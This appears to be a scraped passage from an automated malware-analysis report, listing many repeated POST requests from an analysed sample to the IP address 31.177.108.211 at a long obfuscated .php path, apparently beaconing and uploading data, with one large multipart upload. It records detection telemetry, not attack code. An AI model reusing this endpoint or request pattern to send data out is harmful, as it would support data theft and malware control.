                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global traffic HTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----laBTLt9kYlbCauPgGBWN8RSk4u1OCrMbUc User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 31.177.108.211 Content-Length: 175938 Expect: 100-continue Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2528Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2108Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2108Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2108Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2092Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2520Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2108Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2528Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2084Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
                      Source: global traffic HTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 31.177.108.211 Content-Length: 2528 Expect: 100-continue Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 31.177.108.211 Content-Length: 2108 Expect: 100-continue Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
